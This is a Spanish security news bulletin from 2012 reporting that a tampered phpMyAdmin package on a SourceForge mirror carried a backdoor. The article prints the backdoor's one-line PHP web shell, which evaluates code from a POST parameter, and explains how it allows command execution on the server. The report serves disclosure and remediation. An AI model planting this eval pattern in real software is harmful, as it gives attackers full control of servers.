• Saltar al contenido principal
  • Saltar a la barra lateral principal
  • Saltar al pie de página

Una al Día

Boletín de noticias de Seguridad Informática ofrecido por Hispasec

Usted está aquí: Inicio / Vulnerabilidades / PhpMyAdmin distribuido temporalmente con una puerta trasera

PhpMyAdmin distribuido temporalmente con una puerta trasera

26 septiembre, 2012 Por Jose Ignacio Palacios Ortega 1 comentario

PhpMyAdmin ha reconocido que temporalmente se ha distribuido desde repositorios oficiales de Sourceforge una versión de su programa que ha sido modificada y a la que se le ha añadido una puerta trasera.
El software malicioso se ha encontrado en el paquete «phpMyAdmin-3.5.2.2-all-languages.zip» localizado en el servidor espejo «cdnetworks-kr-1» de SourceForge.net. En este paquete se encontraba el fichero legítimo ‘js/cross_framing_protection.js‘ modificado,  y además archivo ajeno a la distribución que contenía toda la lógica de la puerta trasera: server_sync.php.
El funcionamiento de la puerta trasera permitía a los atacantes obtener el control del servidor donde se hubiese instalado esta versión modificada. El fichero ‘server_sync.php‘ contenía en su interior el siguiente código:
?@eval($_POST[‘c’])?
que se encargaba de evaluar las peticiones POST que contenían el parámetro «c» y ejecutar el código php que tuviese esa petición. En la práctica, significa que con solo realizar una petición al servidor con el phpMyAdmin vulnerado, se podría ejecutar cualquier código PHP y, a partir de ahí si no se encuentra convenientemente bastionado, ejecutar comandos en el servidor a través de directivas PHP como «system«, «exec«…
Fuente: http://arstechnica.com/security/2012/09/questions-abound-as-malicious-phpmyadmin-backdoor-found-on-sourceforge-site/
Desde SourceForge se está investigando aún el caso. Estos servidores alojan más de 300.000 proyectos y no descartan que pueda encontrarse algún proyecto más comprometido, o que la puerta trasera pueda haberse replicado en otro mirror.
Ya se ha agregado un módulo a Metasploit para comprobar desde el programa que existe esta puerta trasera en una instalación.
En enero de 2011 ya atacaron Sourceforge. Se detectaron una serie de ataques dirigidos específicamente contra ellos que concluyeron con el compromiso de varios servidores. Sourceforge se ha vio obligada a apagar «un puñado» de servidores para intentar contrarrestar el ataque.
PhpMyAdmin ha recomendado la descarga y reinstalación completa del software si contiene el fichero ‘server_sync.php‘
Más información:
Servidores de Sourceforge comprometidos por atacantes
http://arstechnica.com/security/2012/09/questions-abound-as-malicious-phpmyadmin-backdoor-found-on-sourceforge-site/
PhpMyAdmin Security Advisory (PMASA-2012-5)
http://www.phpmyadmin.net/home_page/security/PMASA-2012-5.php
Questions abound as malicious phpMyAdmin backdoor found on SourceForge site
http://arstechnica.com/security/2012/09/questions-abound-as-malicious-phpmyadmin-backdoor-found-on-sourceforge-site/
Jose Ignacio Palacios
jipalacios@hispasec.com

Compártelo:

  • Twitter
  • Facebook
  • LinkedIn
  • Reddit
  • Telegram
  • WhatsApp

Publicaciones relacionadas

Publicado en: Vulnerabilidades Etiquetado como: PHP

Interacciones con los lectores

Comentarios

  1. Anónimo dice

    27 septiembre, 2012 a las 7:18 pm

    Calm down. From http://sourceforge.net/blog/phpmyadmin-back-door/

    «Through logs, we have identified that approximately 400 users downloaded this corrupted file.»

    Responder

Deja una respuesta Cancelar la respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Este sitio usa Akismet para reducir el spam. Aprende cómo se procesan los datos de tus comentarios.

Barra lateral principal

Buscador

Email Newsletter

Suscríbase y reciba Una al Día en su correo.

UADCAST

Populares de UAD

  • Troyano bancario Coper afecta a nuevas entidades alrededor del mundo.
  • La Europol detiene a una banda responsable de robar millones a través de ataques phishing.
  • Un contratista municipal sale de copas después del trabajo y pierde un pendrive con datos personales de casi medio millón de residentes
  • El malware FluBot es eliminado en una operación mundial de las fuerzas del orden
  • NSO Group confirma que el software espía Pegasus ha sido utilizado por al menos 5 países europeos

Entradas recientes

  • El malware FluBot es eliminado en una operación mundial de las fuerzas del orden
  • La Europol detiene a una banda responsable de robar millones a través de ataques phishing.
  • Troyano bancario Coper afecta a nuevas entidades alrededor del mundo.
  • Un contratista municipal sale de copas después del trabajo y pierde un pendrive con datos personales de casi medio millón de residentes
  • NSO Group confirma que el software espía Pegasus ha sido utilizado por al menos 5 países europeos
  • El Bridge Horizon de Harmony Protocol, sufre un robo de 100 Millones de dólares
  • Microsoft Defender de Windows ya está disponible para Android e iOS
  • Correo electrónico
  • Facebook
  • LinkedIn
  • RSS
  • Twitter

Footer

Una al Día

Una Al Día nació a raíz de un inocente comentario en un canal IRC hace casi 19 años. A través de los archivos, un lector curioso puede ver cómo ha cambiado (o no) la seguridad de la información desde entonces.

Entradas recientes

  • El malware FluBot es eliminado en una operación mundial de las fuerzas del orden
  • La Europol detiene a una banda responsable de robar millones a través de ataques phishing.
  • Troyano bancario Coper afecta a nuevas entidades alrededor del mundo.
  • Un contratista municipal sale de copas después del trabajo y pierde un pendrive con datos personales de casi medio millón de residentes
  • NSO Group confirma que el software espía Pegasus ha sido utilizado por al menos 5 países europeos

Etiquetas

0-day Android Apple Chrome Ciberataque cve D-Link Facebook Google iOS leak linux malware Microsoft Mozilla OpenSSL Oracle OS X Phishing PHP ransomware rce vulnerabilidad vulnerabilidades Windows WordPress

Copyright © 2022 · Hispasec